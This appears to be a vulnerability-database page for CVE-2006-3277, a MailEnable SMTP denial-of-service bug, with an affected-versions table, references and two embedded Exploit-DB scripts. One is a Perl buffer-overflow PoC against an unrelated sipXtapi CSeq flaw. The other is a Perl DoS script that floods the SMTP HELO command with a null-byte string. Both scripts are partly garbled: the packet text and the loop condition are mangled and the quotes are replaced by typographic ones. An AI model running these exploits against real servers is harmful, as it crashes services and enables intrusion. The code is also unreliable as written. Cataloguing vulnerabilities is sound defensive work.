CVE-2006-3277
published 2006-06-28CVE-2006-3277: The SMTP service of MailEnable Standard 1.92 and earlier, Professional 2.0 and earlier, and Enterprise 2.0 and earlier before the MESMTPC hotfix, allows remote…
PriorityP422medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
6.00%
92.4th percentile
The SMTP service of MailEnable Standard 1.92 and earlier, Professional 2.0 and earlier, and Enterprise 2.0 and earlier before the MESMTPC hotfix, allows remote attackers to cause a denial of service (application crash) via a HELO command with a null byte in the argument, possibly triggering a length inconsistency or a missing argument.
Affected
73 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mailenable | mailenable_enterprise | <= 1.00 | — |
| mailenable | mailenable_enterprise | <= 1.01 | — |
| mailenable | mailenable_enterprise | <= 1.1 | — |
| mailenable | mailenable_enterprise | <= 1.2 | — |
| mailenable | mailenable_enterprise | <= 1.02 | — |
| mailenable | mailenable_enterprise | <= 1.03 | — |
| mailenable | mailenable_enterprise | <= 1.04 | — |
| mailenable | mailenable_enterprise | <= 1.21 | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
exploitdb·2006-07-10
CVE-2006-3524 SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
# PoC Exploit By [email protected]
# Remote Buffer Overflow in sipXtapi
use IO::Socket;
#use strict;
print "sipXtapi Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
print "Usage: sipx.pl \n";
exit;}
$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: \r
\r
END
print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target)
Exploit-DB
MailEnable 1.x - SMTP 'HELO' Remote Denial of Service
exploitdb·2006-06-24
CVE-2006-3277 MailEnable 1.x - SMTP 'HELO' Remote Denial of Service
MailEnable 1.x - SMTP 'HELO' Remote Denial of Service
---
source: https://www.securityfocus.com/bid/18630/info
MailEnable is prone to a remote denial-of-service vulnerability.
This issue allows remote attackers to crash the application, denying further service to legitimate users.
#!/usr/bin/perl -w
#
# Mailenable SMTP DoS exploit
# 24/06/2006
#
# Filbert at divisionbyzero dot be
#
use Net::Telnet;
$string = “\0×99″;
for ($count = 1; $count 60, Errmode=>’return’,Port=>’25′);
$telnet->open($ARGV[0]);use Net::Telnet;
$telnet->print(”helo “, $string, “\n”);
}
No writeups or analysis indexed.
http://secunia.com/advisories/20790http://securitytracker.com/id?1016376http://www.divisionbyzero.be/?p=173http://www.divisionbyzero.be/?p=174http://www.mailenable.com/hotfix/mesmtpc.ziphttp://www.osvdb.org/26791http://www.securityfocus.com/archive/1/438374/100/0/threadedhttp://www.securityfocus.com/bid/18630http://www.vupen.com/english/advisories/2006/2520https://exchange.xforce.ibmcloud.com/vulnerabilities/27387http://secunia.com/advisories/20790http://securitytracker.com/id?1016376http://www.divisionbyzero.be/?p=173http://www.divisionbyzero.be/?p=174http://www.mailenable.com/hotfix/mesmtpc.ziphttp://www.osvdb.org/26791http://www.securityfocus.com/archive/1/438374/100/0/threadedhttp://www.securityfocus.com/bid/18630http://www.vupen.com/english/advisories/2006/2520https://exchange.xforce.ibmcloud.com/vulnerabilities/27387
2006-06-28
Published